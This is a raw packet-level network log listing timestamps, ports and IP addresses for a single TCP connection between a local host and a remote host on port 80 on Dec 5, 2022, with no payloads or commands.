Dec 5, 2022 01:32:57.051780939 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051791906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051850080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051851988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051893950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051903963 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051940918 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051960945 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051984072 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052023888 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052031040 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052064896 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052073002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052143097 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052154064 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052184105 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052190065 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052232027 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052237034 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052280903 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052306890 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052330017 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052347898 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052370071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052372932 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052417040 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052460909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052464962 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052499056 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052505970 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052519083 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052566051 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052614927 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052620888 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052655935 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052666903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052696943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052709103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052743912 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052759886 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052789927 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052815914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052839994 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052843094 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052881956 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052892923 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052930117 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.052932024 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.052980900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053020954 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053031921 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053061962 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053071022 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053102016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053118944 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053143978 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053150892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053185940 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053190947 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053227901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053246975 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053268909 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053273916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053309917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053348064 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053359985 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053395987 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053416014 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053437948 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053440094 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053478956 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053518057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053524017 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053559065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053571939 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053602934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053611040 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053644896 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053653955 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053684950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053693056 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053725958 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053734064 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053766966 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053775072 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053809881 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053816080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053850889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053858995 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053891897 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053905010 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053934097 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053942919 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.053975105 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.053985119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054016113 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054018974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054055929 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054058075 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054097891 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054100990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054137945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054141045 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054177046 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054183006 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054218054 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054220915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054259062 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054260969 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054301023 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054302931 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054342031 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054346085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054382086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054384947 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054421902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054425001 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054461956 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054466009 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054502010 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054505110 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054542065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054550886 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054583073 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054589033 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054624081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054627895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054666042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054678917 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054706097 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054716110 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054758072 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054763079 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054796934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054809093 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054831982 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054840088 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054867029 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054893017 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054918051 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054919958 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054955006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.054968119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.054991007 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055003881 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055023909 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055039883 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055058956 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055071115 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055093050 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055107117 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055130005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055140018 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055165052 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055177927 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055198908 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055212975 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055233955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055243015 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055269957 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055278063 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055305004 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055311918 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055339098 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055346966 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055373907 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055385113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055408001 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055438995 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055440903 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055461884 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055474997 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055491924 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055510044 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055527925 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055546045 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055565119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055579901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055602074 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055614948 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055624008 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055649042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055684090 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055699110 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055717945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055730104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055752993 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055773973 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055789948 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055804968 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055825949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055859089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055876970 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055892944 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055908918 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055927038 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055944920 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055960894 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.055974007 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.055995941 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056004047 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056030035 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056037903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056066036 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056073904 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056102991 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056128025 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056135893 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056155920 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056169987 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056184053 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056204081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056222916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056237936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056255102 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056272984 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056289911 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056307077 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056338072 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056341887 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056364059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056379080 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056389093 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056413889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056428909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056447983 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056463957 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056483030 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056499958 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056515932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056531906 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056550026 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056571960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056583881 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056597948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056618929 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056652069 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056654930 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056670904 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056689978 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056723118 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056735039 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056757927 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056770086 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056794882 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056802988 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056828976 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056838036 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056864023 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056889057 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056898117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056907892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056932926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056941986 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.056967974 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.056976080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057003021 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057012081 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057037115 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057046890 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057070971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057080030 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057105064 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057113886 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057140112 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057149887 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057174921 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057184935 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057210922 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057219982 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057243109 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057259083 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057276964 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057293892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057311058 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057322025 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057343960 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057353973 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057379007 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057405949 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057413101 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057430983 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057446957 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057465076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057496071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057509899 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057529926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057545900 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057564020 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057583094 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057599068 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057617903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057632923 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057647943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057667971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057682991 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057701111 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057712078 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057735920 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057745934 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057771921 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057781935 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057806969 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057815075 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057842016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057851076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057878017 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057887077 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057913065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057924986 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057946920 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057959080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.057981014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.057988882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058015108 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058026075 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058048964 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058058977 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058083057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058093071 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058119059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058126926 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058155060 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058161974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058188915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058197975 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058223963 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058232069 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058259010 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058269024 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058294058 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058305025 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058327913 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058346033 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058362961 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058374882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058398008 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058408022 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058434010 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058444023 CET	49707	80	192.168.2.3	77.73.133.23
